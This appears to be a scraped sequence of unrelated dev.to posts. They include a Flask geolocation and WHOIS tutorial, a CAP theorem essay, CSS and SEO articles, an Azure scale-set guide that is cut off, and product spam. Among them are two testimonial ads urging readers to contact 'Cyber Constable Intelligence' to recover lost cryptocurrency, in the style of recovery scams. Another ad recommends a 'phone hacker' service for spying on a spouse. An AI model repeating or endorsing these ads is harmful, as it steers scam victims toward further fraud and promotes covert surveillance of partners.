## Introduction Flask is a Python micro web framework that does not rely on any particular tool or library to work. Because of it’s simplicity and lightweight nature, many websites had adapted Flask into their backend, such as Pinterest and LinkedIn. Flask allows developers to use any third party extensions to add more functionality. For example, developers can utilize a geolocation lookup extension to lookup for the geolocation information of their visitor. In this article, we will show you how to use IP2Location.io and IP2WHOIS API to perform geolocation and domain WHOIS lookup in Flask. ## Prerequisite Before we start, you will be required to install the following components into your server. - IP2Location.io Python SDK To perform geolocation lookup, you need to install it using this command: `pip install ip2location-io`. - IP2WHOIS Python SDK To perform domain WHOIS lookup, you need to install it using this command: `pip install IP2WHOIS`. You will also need a IP2Location.io API key to perform any type of lookup. You can sign up for a [free API key](https://www.ip2location.io/sign-up#devto), or [purchase a plan](https://www.ip2location.io/pricing#devto) according to your need. ## Steps **Step 1:** In your local server, create a new directory called _mywebsite_, and navigate to the directory. **Step 2:** Create a new file called _app.py_, and paste the following code into the file: ``` from flask import Flask, render_template, jsonify, request import ip2locationio import ip2whois app = Flask(__name__) @app.route('/geolocation-lookup') def geolocation_lookup(): if request.environ.get('HTTP_X_FORWARDED_FOR') is None: ip = request.environ['REMOTE_ADDR'] else: ip = request.environ['HTTP_X_FORWARDED_FOR'] if ip == '127.0.0.1': # Happened in Windows, if the IP got is 127.0.0.1, need to substitute with real IP address ip = '8.8.8.8' # Google Public IP # Configures IP2Location.io API key configuration = ip2locationio.Configuration('YOUR_API_KEY') ipgeolocation = ip2locationio.IPGeolocation(configuration) rec = ipgeolocation.lookup(ip) return render_template('display_ip2locationio_result.html', data=rec) @app.route('/whois-lookup') def index(): domain = "locaproxy.com" # We will use a fixed value for domain name in this tutorial, but you can always change it to accept input from a form or url. # Configures IP2WHOIS API key ip2whois_init = ip2whois.Api('YOUR_API_KEY') # Lookup domain information results = ip2whois_init.lookup(domain) return render_template('display_ip2whois_result.html', data=results) if __name__ == '__main__': app.run(debug=True) ``` **Step 3:** Create a new sub directory called templates. Then, in the templates folder, create two new html files called _display_ip2locationio_result.html_ and _display_ip2whois_result.html_. Paste the following contents into both files respectively: ``` <!-- display_ip2locationio_result.html --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>IP Information</title> <style> body { font-family: Arial, sans-serif; margin: 20px; } table { width: 100%; border-collapse: collapse; margin-bottom: 20px; } table, th, td { border: 1px solid #ccc; } th, td { padding: 10px; text-align: left; } th { background-color: #f4f4f4; } </style> </head> <body> <h1>IP Information for {{ data.ip }}</h1> <table> <tr> <th>Field</th> <th>Value</th> </tr> <tr> <td>IP</td> <td>{{ data.ip }}</td> </tr> <tr> <td>Country Code</td> <td>{{ data.country_code }}</td> </tr> <tr> <td>Country Name</td> <td>{{ data.country_name }}</td> </tr> <tr> <td>Region Name</td> <td>{{ data.region_name }}</td> </tr> <tr> <td>City Name</td> <td>{{ data.city_name }}</td> </tr> <tr> <td>Latitude</td> <td>{{ data.latitude }}</td> </tr> <tr> <td>Longitude</td> <td>{{ data.longitude }}</td> </tr> <tr> <td>Zip Code</td> <td>{{ data.zip_code }}</td> </tr> <tr> <td>Time Zone</td> <td>{{ data.time_zone }}</td> </tr> <tr> <td>ASN</td> <td>{{ data.asn }}</td> </tr> <tr> <td>AS</td> <td>{{ data.as }}</td> </tr> <tr> <td>Is Proxy</td> <td>{{ data.is_proxy }}</td> </tr> </table> </body> </html> ``` ``` <!-- display_ip2whois_result.html --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain Information</title> <style> body { font-family: Arial, sans-serif; margin: 20px; } table { width: 100%; border-collapse: collapse; margin-bottom: 20px; } table, th, td { border: 1px solid #ccc; } th, td { padding: 10px; text-align: left; } th { background-color: #f4f4f4; } </style> </head> <body> <h1>Domain Information for {{ data.domain }}</h1> <table> <tr> <th>Field</th> <th>Value</th> </tr> <tr> <td>Domain</td> <td>{{ data.domain }}</td> </tr> <tr> <td>Domain ID</td> <td>{{ data.domain_id }}</td> </tr> <tr> <td>Status</td> <td>{{ data.status }}</td> </tr> <tr> <td>Create Date</td> <td>{{ data.create_date }}</td> </tr> <tr> <td>Update Date</td> <td>{{ data.update_date }}</td> </tr> <tr> <td>Expire Date</td> <td>{{ data.expire_date }}</td> </tr> <tr> <td>Domain Age</td> <td>{{ data.domain_age }} days</td> </tr> <tr> <td>Whois Server</td> <td>{{ data.whois_server }}</td> </tr> <tr> <td>Registrar</td> <td> Name: {{ data.registrar.name }}<br> URL: <a href="{{ data.registrar.url }}" target="_blank">{{ data.registrar.url }}</a><br> IANA ID: {{ data.registrar.iana_id }} </td> </tr> <tr> <td>Registrant</td> <td> Name: {{ data.registrant.name }}<br> Organization: {{ data.registrant.organization }}<br> Address: {{ data.registrant.street_address }}, {{ data.registrant.city }}, {{ data.registrant.region }} {{ data.registrant.zip_code }}, {{ data.registrant.country }}<br> Phone: {{ data.registrant.phone }}<br> Fax: {{ data.registrant.fax }}<br> Email: {{ data.registrant.email }} </td> </tr> <tr> <td>Admin</td> <td> Name: {{ data.admin.name }}<br> Organization: {{ data.admin.organization }}<br> Address: {{ data.admin.street_address }}, {{ data.admin.city }}, {{ data.admin.region }} {{ data.admin.zip_code }}, {{ data.admin.country }}<br> Phone: {{ data.admin.phone }}<br> Fax: {{ data.admin.fax }}<br> Email: {{ data.admin.email }} </td> </tr> <tr> <td>Tech</td> <td> Name: {{ data.tech.name }}<br> Organization: {{ data.tech.organization }}<br> Address: {{ data.tech.street_address }}, {{ data.tech.city }}, {{ data.tech.region }} {{ data.tech.zip_code }}, {{ data.tech.country }}<br> Phone: {{ data.tech.phone }}<br> Fax: {{ data.tech.fax }}<br> Email: {{ data.tech.email }} </td> </tr> <tr> <td>Billing</td> <td> Name: {{ data.billing.name }}<br> Organization: {{ data.billing.organization }}<br> Address: {{ data.billing.street_address }}, {{ data.billing.city }}, {{ data.billing.region }} {{ data.billing.zip_code }}, {{ data.billing.country }}<br> Phone: {{ data.billing.phone }}<br> Fax: {{ data.billing.fax }}<br> Email: {{ data.billing.email }} </td> </tr> <tr> <td>Nameservers</td> <td> <ul> {% for nameserver in data.nameservers %} <li>{{ nameserver }}</li> {% endfor %} </ul> </td> </tr> </table> </body> </html> ``` **Step 4:** In your terminal, navigate to the project directory, and run the following command to start the local server: `flask run`. Take note that if you named the _app.py_ to other name such as _website.py_, the command will become `flask --app website run` instead. **Step 5:** Now you can go to your browser, and navigate to the link http://127.0.0.1:5000/geolocation-lookup and http://127.0.0.1:5000/whois-lookup to see the results. You will see similar outputs displayed in the screenshot below. ![IP address information](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/382f0xzu1zyvk87kes2m.png) ![Domain information](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/en17144ae8g6uq7eoof1.png) --- For more tutorials, please visit [IP2Location IP Gelocation](https://blog.ip2location.com/#devto) Where can I find [free IP Geolocation API](https://www.ip2location.io/#devto)? Where can I get [free IP Geolocation database](https://lite.ip2location.com/#devto)?
ip2location
1,912,157
My 3 years using CAP Theorem in 5 minutes
A simple and popular mention of the CAP Theorem in office work is: It’s not possible to have...
0
2024-07-05T02:48:47
https://dev.to/prestonp/my-3-years-using-cap-theorem-in-5-minutes-1ojn
captheorem, softwareengineering, softwaredevelopment, systemdesignconcepts
--- title: My 3 years using CAP Theorem in 5 minutes published: true date: 2024-07-05 02:44:00 UTC tags: captheorem,softwareengineering,softwaredevelopment,systemdesignconcepts canonical_url: --- ![A colorful painting of a mango tree wearing a cap, in the style of 1800s, pixel art](https://cdn-images-1.medium.com/max/1024/1*UfftpmFmqMaiGZ-YpuDLOg.png) A simple and popular mention of the CAP Theorem in office work is: > It’s not possible to have Consistency, Availability, and Partition tolerance at the same time. There are many other variants. I’m sure most engineers have heard at least one. The more complex but rarely mentioned explanation of the CAP Theorem would be from its original author, in this keynote from July 2000: [Brewer PODC Keynote](https://sites.cs.ucsb.edu/~rich/class/cs293b-cloud/papers/Brewer_podc_keynote_2000.pdf). The most complex and almost never discussed is CAP’s proof. For example, this nicely written paper: [Brewer’s Conjecture And The Feasibility of Consistent, Available, Partition-Tolerance Web Services](https://users.ece.cmu.edu/~adrian/731-sp04/readings/GL-cap.pdf). I think the Simple CAP is not suitable to convey its meaning accurately, at least not enough for software development work, especially when decisions need to be made. **💡 Dangerously, decisions that require mentioning CAP are often important ones.** On the other hand, the Complex CAP is too long and too technical. There are many details requiring an understanding of distributed system theory. In most cases outside research, we don’t actually need those. Needless to say, it is rarely used in offices. I seek something in the middle for my own use and came up with what I call “Sweet CAP.” It is not a single sentence, but four. Here they are: > _C in CAP is strong consistency._ > _With many servers, P is always needed so we simply choose C or A._ > _A is preferred in most cases not involving money, together with eventual consistency._ > _Simplicity first, you may not need to worry about CAP at a small scale._ Certainly, saying all four at the same time is weird. I choose to use each sentence when necessary. For example: > Jerry: Because of CAP, our service needs to shut down when we are doing this operation to maintain consistency. > Me: Wait a second, we only need to shut down if we need strong consistency. Is it this case? I have used these in my work over the last three years in chats, talks, and design documents. My colleagues seem to be okay with it. Most don’t have a problem understanding the message I want to convey. Sometimes, it even ignites more enjoyable discussions. That’s why it is Sweet CAP. * * *
prestonp
1,912,152
The Benefits of Polyurethane Sandwich Panels in Building Projects
The structure of polyurethane sandwich panel is a special type in the category of panels used for...
0
2024-07-05T02:38:51
https://dev.to/harold_rmessiersyr_756b/the-benefits-of-polyurethane-sandwich-panels-in-building-projects-bc1
design
The structure of polyurethane sandwich panel is a special type in the category of panels used for building projects. These panels are three-layered with a middle core for filling, top surface and bottom layers The panels include a polyurethane foam central core which also serves to stabilize temperature, and thus the panel can be installed in various contexts/constructions. The top and bottom layers are made of rigid galvanized steel which enhances the strength level of them. Polyurethane sandwich panels being made up of a particular structural composition come with numerous benefits. Lightweight, making them easy to install and can be customized according to your project's needs. These Polyurethane sandwich Panel come in different sizes and they can be tailored to meet a particular building requirement. They also have an environmental side to them as they are made from recycled materials and do not emit harmful substances in the process of producing or using. The safety and innovation are the two features of polyurethane sandwich panels. These panels comply with all applicable laws and regulations, so the ChronoSpeed model offers maximum protection. These core material just like polyurethane is fire retarded, it has been proven by the National Fire Protection Association (NFPA) to maintain their integrity in case of an emergency. Furthermore, these sheets are immune from water or rust and will be one of the finest to utilize in severe weather circumstances as they give safety against other foreign things. Polyurethane sandwich panels are easy to install and use in real applications. The first step in the project is to define exactly what size and thickness the panels need if they are going to perform as intended. This is followed by choosing the perfect top and bottom layers according to what makes sense logistically, as well as design wise. These Foam sandwich Panel are then cut to exact sizes and seamed together with proprietary tools. Polyurethane sandwich panels are synonymous with premium service and versatility. They provide durable solution which is very cost-competitive proposal in view of life saving after enough ability to stand against severe weather circumstances, resistant from fire and pest. In addition to this, they are low maintenance and easy to install making them the perfect choice for large building projects. Applications for polyurethane sandwich panels are widespread ranging from large industrial projects such as warehouses, factories to ordinary residential and office buildings including cold storage facilities. They are most common in environments that need temperature control such as refrigeration units and laboratories due to their excellent thermal insulation properties. To sum up, polyurethane sandwich panels are an intelligent and cost-effective choice for almost all building projects at both small or large scale. Their numerous Rock Wool Sandwich Panel advantages like thermal efficiency, strength and versatility also render them suitable for construction purposes. These panels pay special attention to safety, sustainability and easy-to-install features making them an ideal choice on elaborate building projects. Take a page out of this book and power up your next construction project with Polyurethanes sandwich panels!
harold_rmessiersyr_756b
1,912,144
HIRING THE BEST BITCOIN RECOVERY EXPERT FROM CYBER CONSTABLE INTELLIGENCE
WhatsApp info: +1 ( 252 ) 378- 7611 Website info: https://cyberconstableintelligence… com) Email...
0
2024-07-05T02:31:50
https://dev.to/caylon_sands_3b65bbe6d3c7/hiring-the-best-bitcoin-recovery-expert-from-cyber-constable-intelligence-bgh
WhatsApp info: +1 ( 252 ) 378- 7611 Website info: https://cyberconstableintelligence… com) Email info: (support(@)cyberconstableintelligence).  com) Just a mere month ago, I found myself teetering on the precipice of financial disaster, all thanks to an ill-fated decision to invest my hard-earned £5000 with a crypto investment company I stumbled upon on Telegram. The promises were grandiose, the returns seemingly too good to be true. And, as it turned out, they were indeed too good to be true. The individual behind the screen painted a mesmerizing picture of success, luring me in with the allure of high returns and quick profits. Naive and hopeful, I took the plunge, depositing my savings into their platform with dreams of financial freedom dancing in my mind. However, the dream quickly soured into a nightmare when I attempted to withdraw my initial investment. Despite seeing the purported amount displayed tantalizingly on the dashboard, access to my funds was inexplicably barred. Panic set in as I realized I had fallen victim to a meticulously crafted scam. The realization hit me like a freight train. I was on the brink of bankruptcy, my hard-earned money seemingly evaporating into thin air. Feelings of helplessness and despair engulfed me as I grappled with the harsh reality of my situation. Just when I was about to succumb to despair, a ray of hope pierced through the darkness in the form of an article I stumbled upon on Medium. It spoke of a company by the name of Cyber Constable Intelligence, claiming to specialize in recovering funds lost to online scams. Skeptical yet desperate, I decided to reach out to them, clinging to the sliver of hope they offered. To my astonishment and immense relief, Cyber Constable Intelligence lived up to its lofty reputation. With unparalleled expertise and professionalism, they swiftly embarked on the arduous task of retrieving my lost funds. Within a mere week, they had succeeded where I had thought all hope was lost—they helped me recover my £5000. Words cannot express the overwhelming sense of gratitude and relief I felt upon receiving my reclaimed funds. Cyber Constable Intelligence not only salvaged me from the jaws of financial ruin but restored my faith in humanity. Their unwavering dedication and commitment to their clients are a testament to their integrity and reliability. This has taught me invaluable lessons that I will carry with me for a lifetime. I have learned to exercise caution and discernment in my financial endeavors, to tread carefully, and to scrutinize every opportunity that presents itself. No longer will I be swayed by the false promises of strangers peddling dreams of easy wealth. Instead, I vow to approach investments with meticulous care, consulting with financial experts and conducting thorough due diligence before parting ways with my hard-earned money. I understand now, more than ever, the importance of investing only what I can afford to lose and staying vigilant against the ever-looming specter of online scams. To anyone who finds themselves teetering on the edge of financial ruin or falling victim to the siren song of fraudulent schemes, I implore you—do not lose hope. There are reputable recovery services like Cyber Constable Intelligence out there, ready and willing to lend a helping hand in your worst hour. I urge all who read this to heed my cautionary tale and approach investments with the utmost care and diligence. Stay safe, stay informed, and may your financial endeavors be guided by wisdom and prudence.
caylon_sands_3b65bbe6d3c7
1,912,143
Why and How to Use Box-Sizing: 'Border-Box' in Your CSS Layouts
When working with CSS, one of the most crucial yet often misunderstood properties is box-sizing. This...
0
2024-07-05T02:28:59
https://dev.to/cindykandie/why-and-how-to-use-box-sizing-border-box-in-your-css-layouts-30ei
css, tailwindcss, frontend
When working with CSS, one of the most crucial yet often misunderstood properties is `box-sizing`. This property plays a significant role in how elements are sized and can make the difference between a layout that behaves as expected and one that doesn't. In this article, we'll dive deep into the `box-sizing` attribute, understand its variations, and explore why it is essential for creating consistent and predictable layouts. #### What is `box-sizing`? The `box-sizing` property allows us to control how the width and height of an element are calculated. By default, CSS uses the `content-box` value for `box-sizing`, which means the width and height you set for an element only include the content area, excluding padding and border. However, this default behaviour can often lead to unexpected results, especially when adding padding and borders. #### Variations of `box-sizing` There are two primary values for the `box-sizing` property: 1. `content-box` (default): The width and height properties include only the content. Padding and border are added outside of the content area, increasing the total size of the element unexpectedly. 2. `border-box`: The width and height properties include the content, padding, and border. This means the total size of the element is constrained to the specified width and height, regardless of padding or border. Let's explore how these variations work with some practical examples. #### Example: `content-box` vs. `border-box` Consider the following HTML and CSS: ```html <div class="content-box">Content Box</div> <div class="border-box">Border Box</div> ``` ```css div { width: 200px; height: 100px; padding: 20px; border: 10px solid #333; margin: 10px; } .content-box { box-sizing: content-box; //the default background-color: lightblue; } .border-box { box-sizing: border-box; background-color: lightcoral; } ``` ### Results ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r21dsz6uiehnj2bf949p.png) When using `content-box`, the actual rendered size of the `.content-box` element is: * Width: 200px (content) + 40px (padding) + 20px (border) = 260px * Height: 100px (content) + 40px (padding) + 20px (border) = 160px In contrast, when using `border-box`, the `.border-box` element's total size remains exactly 200px by 100px because the padding and border are included in the specified dimensions. #### Why is `box-sizing` Important? 1. **Predictable Layouts**: By using `box-sizing: border-box`, you ensure that the dimensions you set are the dimensions you get. This predictability is crucial when creating complex layouts, especially in responsive design where elements must fit perfectly within their containers. 2. **Simplified Calculations**: With `border-box`, you don't have to calculate and adjust for padding and border manually, simplifying the process of setting element sizes. 3. **Consistency Across Elements**: Applying `box-sizing: border-box` globally ensures a consistent box model throughout your project, reducing the chances of layout inconsistencies and bugs. #### Practical Example: Global `box-sizing` A common best practice is to apply `box-sizing: border-box` to all elements using a universal selector: ```css *, *::before, *::after { box-sizing: border-box; } ``` This rule ensures that all elements, including pseudo-elements, adhere to the `border-box` model, providing a solid foundation for your layouts. #### Maintaining Dimensions with Borders Consider the following example where we have a simple circle without any `box-sizing` applied: ```javascript htmlCopy code<body> <div class='a'></div> <body> <style> body { background: pink; display: flex; align-items: center; justify-content: center; } .a { background: black; height: 100px; width: 100px; border-radius: 100%; } </style> ``` **Result:** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bysn91u0ydq72e94vi5j.png) Here, no `box-sizing` is needed as no additional elements like borders or padding affect its 100px width and height. Now, let's say you want to add a border to the circle while still maintaining its dimensions: ```javascript htmlCopy code<body> <div class='a'></div> <body> <style> body { background: pink; display: flex; align-items: center; justify-content: center; } .a { background: black; height: 100px; width: 100px; border-radius: 100%; border: 30px solid purple; } </style> ``` **Result:** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0sml163cznjfyb827ei0.png) Simply adding the border increases the width and height by 60px each (30px border on all sides). To maintain the original dimensions, you could reduce the width and height by 60px, but using `box-sizing: border-box` allows you to avoid manual calculations: ```javascript <body> <div class='a'></div> <body> <style> body { background: pink; display: flex; align-items: center; justify-content: center; } .a { background: black; height: 100px; width: 100px; border-radius: 100%; border: 30px solid purple; box-sizing: border-box; //simply add this } </style> ``` **Result:** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mbyiyu0m0jlw7a1kwo0m.png) Adding the `box-sizing: border-box` attribute helps you maintain the circle's dimensions while achieving your design goals. #### Creative Uses of `box-sizing` Beyond maintaining consistent layouts, `box-sizing` can be creatively used to achieve specific design effects. For example, when creating a button with equal padding inside, using `border-box` ensures that adding borders or increasing padding does not affect the overall size of the button, preserving the design integrity. ```css button { padding: 10px 20px; border: 2px solid #000; background-color: #f0f0f0; box-sizing: border-box; } ``` Here, the button's size remains consistent, regardless of any changes to padding or border, making it easier to maintain uniformity across different buttons. #### Conclusion Understanding and effectively using the `box-sizing` property is vital for any CSS developer aiming to create reliable and maintainable layouts. By adopting `box-sizing: border-box`, you can simplify your CSS, avoid common pitfalls, and ensure that your designs are consistent across different elements and screen sizes. Embrace the power of `box-sizing` to keep your layouts in perfect order and elevate your CSS skills to the next level. See you on the next one!
cindykandie
1,912,142
MOST RELIABLE BITCOIN RECOVERY EXPERT// CYBER CONSTABLE INTELLIGENCE
In the digital age, where opportunities and risks coexist in equal measure, CYBER CONSTABLE...
0
2024-07-05T02:27:36
https://dev.to/mary_pruett_85f86d0ad836d/most-reliable-bitcoin-recovery-expert-cyber-constable-intelligence-1h9a
webdev, javascript, programming, beginners
In the digital age, where opportunities and risks coexist in equal measure, CYBER CONSTABLE INTELLIGENCE emerges as a guiding force, offering solace and support to those who fall by the intricate web of online scams and frauds. Their name carries weight, synonymous with reliability and resilience in the face of adversityThe recounted tale of financial ruin serves as a poignant reminder of the pervasive threats that loom in the virtual realm. Amidst the chaos, CYBER CONSTABLE INTELLIGENCE stands tall, a beacon of support for those navigating the murky waters of cybercrime. Theirs is a mission defined by unwavering dedication and unwavering resolve, a testament to their commitment to safeguarding the interests of their clients. What distinguishes CYBER CONSTABLE INTELLIGENCE is its unwavering commitment to transparency and accountability. Rooted in a foundation of trust, they approach each case with meticulous care and attention to detail. Theirs is a journey guided by integrity, where the pursuit of justice takes precedence above all else. In the case under scrutiny, CYBER CONSTABLE INTELLIGENCE response was nothing short of remarkable. Armed with a wealth of knowledge and expertise in cybercrime intervention, they embarked on a journey to reclaim what was rightfully theirs. Theirs was a mission defined by precision and determination, a testament to their unwavering commitment to their client's well-being. The road to recovery was fraught with challenges, yet CYBER CONSTABLE INTELLIGENCE navigated it with poise and resilience. Through careful investigation and strategic intervention, they successfully reclaimed every penny of the staggering 10.06 BTC unlawfully seized from the victim. Their triumph was not merely financial but symbolic, a testament to the indomitable spirit of those who refuse to be cowed by adversity. But CYBER CONSTABLE INTELLIGENCE impact extends far beyond mere restitution. By empowering individuals to reclaim their autonomy and security in the digital realm, they sow the seeds of resilience and fortitude. Their unwavering dedication to their client's well-being serves as a beacon of hope in an otherwise uncertain world. This testimonial stands as a testament to the efficacy of CYBER CONSTABLE INTELLIGENCE services. It is a testament to their integrity and unwavering commitment to justice. In a world rife with uncertainty, they stand as a bastion of stability, offering a lifeline to those in need. As we traverse the ever-evolving landscape of cyberspace, CYBER CONSTABLE INTELLIGENCE stands as a steadfast ally, ready to confront the challenges that lie ahead. Their expertise in cybercrime intervention is unparalleled, providing individuals with the reassurance that they are not alone in their fight against online fraudsters. CYBER CONSTABLE INTELLIGENCE is not just a service provider; they are experts for those who have been victimized by online scams and fraud. With their unwavering commitment to justice and integrity, they offer a glimmer of hope amidst the chaos of the digital world. As we continue to navigate the complexities of the digital age, CYBER CONSTABLE INTELLIGENCE stands as a steadfast ally, guiding us toward a safer and more secure prospect. Clink on the link below: WhatsApp info: +1 (252) 378-7611 Website info: https://cyberconstableintelligence. com Email info: support@cyberconstableintelligence. com
mary_pruett_85f86d0ad836d
1,912,132
Fundamental Parts of a Successful SEO Plan in Digital Marketing
In today's competitive world of digital marketing, a winning SEO strategy isn't just about getting...
0
2024-07-05T02:10:58
https://dev.to/juddiy/fundamental-parts-of-a-successful-seo-plan-in-digital-marketing-24ol
seo, marketing, learning
In today's competitive world of digital marketing, a winning SEO strategy isn't just about getting high rankings and lots of traffic. It's about reaching the right audience and driving real business results. So, what are the key ingredients for creating a successful SEO strategy? 1. **In-depth Keyword Research**: Understanding the search terms used by your target audience is crucial. Utilize tools like [SEO AI](https://seoai.run/) to identify high-traffic and relevant keywords. SEO AI excels in advanced algorithmic analysis and AI support, helping optimize keyword selection and webpage content structure. 2. **Creating High-Quality Content**: Search engines increasingly prioritize content quality and relevance. Providing valuable and engaging content not only attracts and retains readers but also enhances rankings in search engines. 3. **On-Page SEO**: Ensure that webpage structure, tags, meta descriptions, and titles are optimized. These elements not only influence how search engines understand your pages but also directly impact user click-through rates and experience. 4. **Mobile-Friendliness**: With the proliferation of mobile devices, ensuring your website performs well on mobile is crucial. Responsive design and fast loading speeds are essential. 5. **Technical SEO**: Optimizing technical aspects such as page loading speed, code structure, and security (e.g., SSL certificates) improves search engine crawler efficiency and enhances user experience. 6. **Off-Page SEO**: Building high-quality backlinks significantly boosts website authority and rankings. Collaborating with authoritative websites in your industry to publish content or implementing PR strategies can effectively build backlinks. 7. **User Experience (UX)**: Good user experience includes fast page loading times, easy navigation, effective content layout, and accurate answers to user queries. 8. **Regular Analysis and Adjustment**: Use tools like Google Analytics to continually monitor website performance and user behavior. Adjust your SEO strategy promptly to adapt to evolving market trends and search engine algorithms. A successful SEO strategy is a comprehensive and multi-faceted process. By focusing on these key elements, businesses can achieve significant success in digital marketing, attract more potential customers, and stand out in a competitive market.
juddiy
1,912,141
Bluekin Hardware: Your One-Stop Shop for Nails, Wire, and Wire Mesh
Bluekin Hardware:Your Best Source of Nails, Wire and wire mesh Are you a wood or metal crafter at...
0
2024-07-05T02:24:23
https://dev.to/harold_rmessiersyr_756b/bluekin-hardware-your-one-stop-shop-for-nails-wire-and-wire-mesh-2o6o
design
Bluekin Hardware:Your Best Source of Nails, Wire and wire mesh Are you a wood or metal crafter at heart? If that is so, then you know how important finding the right products are to making your projects a reality. Well, search no more because here at Bluekin Hardware we have a wide variety of nails and wires & wire steel mesh products for every or any project you got in mind. Here are some reasons that will compel you to opt for Bluekin Hardware as your |Leading Store. Benefits of Bluekin Hardware The moment you walk into Bluekin Hardware, quality is something that just enough for your needs! Your Satisfaction is our Victory - A true saying that describes our Hotel very thoroughly, as we never allow you to leave unsatisfied. Our well-developed and tested hotel reservation system helps you around every single feature of automating your online business.cljs:45-31 Additionally, we offer competitive pricing for you to stay within budget and get the materials that you need. Innovation, and ensuring safety Bluekin Hardware is all about innovation and safety most of anything. That commitment manifests in our catalogue of products, that are all as safe to use as they can be and that we consider carefully tailored (literally) specifically towards you. We will continue to search and test new chemicals with our dedicated team, ensuring you the best from on-the-market. Nails, Wire And Mesh Can Be Used In Any Number Of Projects Nails, wire and hardware cloth are the unsung heroes of so many projects. From building a robust wooden fence, to creating one of your very own metal art pieces or perhaps just needing to secure two materials together; we have the right reinforced mesh product for youlikelihood. Product Usage Instructions Taking your way through the product classes of Bluekin Hardware is simple. Just choose the right way for your project and follow them. If you have any questions, or need help our expert team is always available to hep and assist Unparalleled Customer Service For the good of our customers, Bluekin Hardware is committed to running a clean business every day. From choosing the right product for your needs to learning how to use our materials effectively, you can count on us. I assure you that you are in good hands. We Curate the Right Quality for Every Project Regardless of the size or complexity level of your project, you can rely on Bluekin Hardware to deliver stainless steel wire mesh products that meet exactly what you are looking for. We have laid out a large selection of nails, wire and woven wire mesh to supply the many various jobs. With experience in everything from large construction projects to small home repairs, we have the skill set needed. That is it for Bluekin Hardware: the best source of nails, wire and wire mesh. Stay confident that when you turn to us, we will be ready with the materials it takes to get your projects done right because at Ampm Open House our commitment is clear: You can trust in quality products and cutting-edge solutions from a team who truly cares. Whether you are a professional tradesman in the industry or an enthusiastic DIYer, we have endeavoured to deliver our products to empower your path on success. Choose right visit us at Bluekin Hardware to EXPERIENCE the AMAZING DIFFERENCE!!!
harold_rmessiersyr_756b
1,912,140
WEB BAILIFF CONTRACTORS LEGIT PHONE HACKER
I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school...
0
2024-07-05T02:23:00
https://dev.to/philip_grisly_ecd2f26ea7b/web-bailiff-contractors-legit-phone-hacker-58hj
I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school lover even though we have 2 little children. I hopped on the internet to look for a phone hacker so that I could confirm my fears when I came across Web Bailiff Contractors who has hundreds of reviews as legit phone hackers. I gave them her info and they got back to me me in about 4 hours. You can just search them on google and head on to their website where you can communicate via the chat feature or the contact details displayed.I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school lover even though we have 2 little children. I hopped on the internet to look for a phone hacker so that I could confirm my fears when I came across Web Bailiff Contractors who has hundreds of reviews as legit phone hackers. I gave them her info and they got back to me me in about 4 hours. You can just search them on google and head on to their website where you can communicate via the chat feature or the contact details displayed
philip_grisly_ecd2f26ea7b
1,912,139
Export any Web Page to Markdown
TLDR; Here’s the chrome extension link. If you search for same solution on internet, everyone will...
0
2024-07-05T02:22:15
https://dev.to/amit_kharel_aae65abe2b111/export-any-web-page-to-markdown-23f
markdown
> TLDR; Here’s the chrome extension [link](https://chromewebstore.google.com/detail/export-to-markdown/dodkihcbgpjblncjahodbnlgkkflliim). If you search for same solution on internet, everyone will force you to install unwanted node modules and libraries which doesn’t work at the end. Here’s a simple solution: ### Solution: - Open Google Chrome Store through this [link](https://chromewebstore.google.com/detail/export-to-markdown/dodkihcbgpjblncjahodbnlgkkflliim). ![Chrome Web Store](https://cdn-images-1.medium.com/max/2286/1*mXXLjcY22LcoVx2Zo3nflA.png) - Click on **Add to Chrome** button. - That’s it !!! Now just visit the web page you want to export, go to the list of extensions and click on **“Export to Markdown”**. ![Export to Markdown](https://cdn-images-1.medium.com/max/2338/1*whBkK_XwxyKcKTr86RThlg.png) - You’ll get preview of the markdown as below. Just click **copy to clipboard** and paste it into a file. ![](https://cdn-images-1.medium.com/max/2338/1*0oIQZxvazmTBKyS36r8-iQ.png)
amit_kharel_aae65abe2b111
1,912,138
How to Create Virtual Machine Scale Set.
Login to Azure Create a Virtual Machine Scale Set Clean Up Resource This article steps through...
0
2024-07-05T02:20:16
https://dev.to/emeka_moses_c752f2bdde061/how-to-create-virtual-machine-scale-set-1l0m
azure, balancer, vmss, load
- Login to Azure - Create a Virtual Machine Scale Set - Clean Up Resource This article steps through using Azure portal to create a Virtual Machine Scale Set. ## Loging To Azure Sign in to the Azure portal. ## Create a Virtual Machine Scale Set You can deploy a scale set with a Windows Server image or Linux image such as RHEL, Ubuntu, or SLES. - Type Scale set in the search box. In the results, under Marketplace, select Virtual Machine Scale Sets. - Select Create on the Virtual Machine Scale Sets page, which opens the Create a Virtual Machine Scale Set page. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/awiwotci5r8r27d216ut.PNG) - In the Basics tab, under Project details, make sure the correct subscription is selected and create a new resource group called myVMSSResourceGroup. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p2fbdb6ex7gttdhsgzn1.PNG) - Under Scale set details, set myScaleSet for your scale set name and select a Region that is close to your area - Under Orchestration, select Uniform. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/apl8pzurg0tolqu29sma.PNG) - Under Instance details, select a marketplace image for Image. Select any of the Supported Distros. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/prorkkjnnfbjd7ghymh6.PNG) - Under Administrator account configure the admin username and set up an associated password or SSH public key. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nb596l5vwtqkswbubgl0.PNG) A Password must be at least 12 characters long and meet three out of the four following complexity requirements: one lower case character, one upper case character, one number, and one special character. If you select a Linux OS disk image, you can instead choose SSH public key. You can use an existing key or create a new one. - Select Next: Disks to move the disk configuration options leave the default disk configurations. - Select Next: Networking to move the networking configuration options. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gttur4qs3gx2ptn50ocx.PNG) - On the Networking page, under Load 